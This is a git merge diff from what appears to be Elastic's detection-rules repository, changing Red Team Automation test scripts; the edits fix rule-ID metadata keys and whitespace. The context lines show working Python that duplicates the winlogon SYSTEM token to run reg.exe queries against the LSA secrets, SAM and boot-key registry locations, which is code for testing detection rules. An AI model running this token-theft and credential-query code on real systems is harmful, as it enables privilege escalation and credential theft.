Merge branch 'main' of github.com:elastic/detection-rules

rta/credaccess_reg_query_privesc_token_manip.py

@@ -12,10 +12,10 @@ metadata = RtaMetadata(
     uuid="59329aa6-852a-44d0-9b24-322fe4fbdad0",
     platforms=["windows"],
     endpoint=[
-    {'rule_id': 'c5ee8453-bc89-42e7-a414-1ba4bec85119', 'rule_name': 'Suspicious Access to LSA Secrets Registry'}, 
-    {'rule.id': 'b6e8c090-f0ec-4c4c-af00-55ac2a9f9b41', 'rule_name': 'Security Account Manager (SAM) Registry Access'},
-    {'rule.id': '2afd9e7f-99e0-4a4d-a6e3-9e9db730f63b', 'rule_name': 'Privilege Escalation via EXTENDED STARTUPINFO'},
-    {'rule.id': '46de65b8-b873-4ae7-988d-12dcdc6fa605', 'rule_name': 'Potential Privilege Escalation via Token Impersonation'},
+    {'rule_id': 'c5ee8453-bc89-42e7-a414-1ba4bec85119', 'rule_name': 'Suspicious Access to LSA Secrets Registry'},
+    {'rule_id': 'b6e8c090-f0ec-4c4c-af00-55ac2a9f9b41', 'rule_name': 'Security Account Manager (SAM) Registry Access'},
+    {'rule_id': '2afd9e7f-99e0-4a4d-a6e3-9e9db730f63b', 'rule_name': 'Privilege Escalation via EXTENDED STARTUPINFO'},
+    {'rule_id': '46de65b8-b873-4ae7-988d-12dcdc6fa605', 'rule_name': 'Potential Privilege Escalation via Token Impersonation'},
     ],
     siem=[],
     techniques=["T1134", "T1003"],
@@ -104,29 +104,29 @@ def main():
 
     CloseHandle = windll.kernel32.CloseHandle
     CloseHandle.argtypes = [wintypes.HANDLE]
-    CloseHandle.restype = wintypes.BOOL 
-    
-    # Duplicate winlogon.exe System Token 
-    hprocess = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, 0, common.getppid("winlogon.exe")) 
-    OpenProcessToken(hprocess, TOKEN_DUPLICATE | TOKEN_IMPERSONATE, byref(hsystem_token)) 
-    DuplicateTokenEx(hsystem_token, TOKEN_ALL_ACCESS, 0, SecurityImpersonation, TokenPrimary, byref(hsystem_token_dup)) 
-    
-    # create process with winlogon system token duplicate to query specific sensitive registry keys using reg.exe 
-    process_info = PROCESS_INFORMATION() 
-    startup_info = STARTUPINFO() 
+    CloseHandle.restype = wintypes.BOOL
+
+    # Duplicate winlogon.exe System Token
+    hprocess = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, 0, common.getppid("winlogon.exe"))
+    OpenProcessToken(hprocess, TOKEN_DUPLICATE | TOKEN_IMPERSONATE, byref(hsystem_token))
+    DuplicateTokenEx(hsystem_token, TOKEN_ALL_ACCESS, 0, SecurityImpersonation, TokenPrimary, byref(hsystem_token_dup))
+
+    # create process with winlogon system token duplicate to query specific sensitive registry keys using reg.exe
+    process_info = PROCESS_INFORMATION()
+    startup_info = STARTUPINFO()
     cmdline = u" /c reg.exe query hklm\\security\\policy\\secrets && reg.exe query hklm\\SAM\\SAM\\Domains\\Account && reg.exe query hklm\\SYSTEM\\ControlSet001\\Control\\Lsa\\JD && reg.exe query hklm\\SYSTEM\\ControlSet001\\Control\\Lsa\\Skew1"
-    res = CreateProcessWithTokenW(hsystem_token_dup, LOGON_WITH_PROFILE, u"C:\\Windows\\System32\\cmd.exe", cmdline, 0, 0, 0, byref(startup_info), byref (process_info)) 
-    
+    res = CreateProcessWithTokenW(hsystem_token_dup, LOGON_WITH_PROFILE, u"C:\\Windows\\System32\\cmd.exe", cmdline, 0, 0, 0, byref(startup_info), byref (process_info))
+
     # check process creation result
     if res == 1 :
        common.log("Executed RTA")
-    else : 
+    else :
        common.log("Failed to execute RTA")
-       
-    # Close all the handles 
-    common.log("Closed all Handles") 
-    CloseHandle(hsystem_token_dup) 
-    CloseHandle(hsystem_token) 
+
+    # Close all the handles
+    common.log("Closed all Handles")
+    CloseHandle(hsystem_token_dup)
+    CloseHandle(hsystem_token)
     CloseHandle(hprocess)
 
 if __name__ == "__main__":

rta/shellcode_load_ws2_32_unbacked.py

@@ -17,7 +17,7 @@ metadata = RtaMetadata(
     endpoint=[
         {'rule_id': 'aa265fbd-4c57-46ff-9e89-0635101cc50d',
          'rule_name': 'Network Module Loaded from Suspicious Unbacked Memory"'},
-        {'rule.id': 'ace0bb76-290f-4f5f-a21f-c3b13ee415a9',
+        {'rule_id': 'ace0bb76-290f-4f5f-a21f-c3b13ee415a9',
          'rule_name': 'Potential Masquerading as Windows Error Manager'},
     ],
     siem=[],